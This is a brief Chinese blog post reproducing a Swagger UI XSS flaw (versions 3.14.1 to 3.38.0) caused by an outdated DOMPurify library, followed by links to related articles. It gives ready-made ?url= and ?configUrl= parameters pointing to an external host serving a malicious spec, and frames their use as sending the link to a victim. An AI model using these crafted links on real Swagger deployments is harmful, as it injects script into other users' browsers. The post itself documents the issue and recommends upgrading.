swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
沈千秋.19 小时前
xss.pwnfunction.com闯关(1~6)
java·前端·xss
¥懒大王¥2 天前
XSS-Game靶场教程
前端·安全·web安全·xss
快乐肚皮4 天前
一文了解XSS攻击:分类、原理与全方位防御方案
java·前端·xss
小阿宁的猫猫5 天前
CSRF漏洞的原理、防御和比赛中的运用
安全·http·xss·csrf
ccino .5 天前
pdf-xss文件制作过程
前端·pdf·xss
小阿宁的猫猫5 天前
XSS的原理、使用、防御方法及练习题
web安全·网络攻击模型·xss·js
hhcgchpspk7 天前
一次msf免杀渗透入门实践
linux·经验分享·网络安全·系统安全·渗透·msf
犬大犬小7 天前
从头说下DOM XSS
前端·javascript·xss
无名修道院7 天前
XSS 跨站脚本攻击:3 种类型(存储型 / 反射型 / DOM 型)原理以 DVWA 靶场举例
前端·网络安全·渗透测试·代码审计·xss
文刀竹肃8 天前
DVWA -XSS(DOM)-通关教程-完结
前端·安全·网络安全·xss
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03UV安装并设置国内源04Linux下V2Ray安装配置指南05Gemini3 生成的基于手势控制3D粒子圣诞树06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题08Labelme从安装到标注:零基础完整指南09GLM-4.7 vs MiniMax-M2.1:代码工程理解10CentOS的ISO镜像下载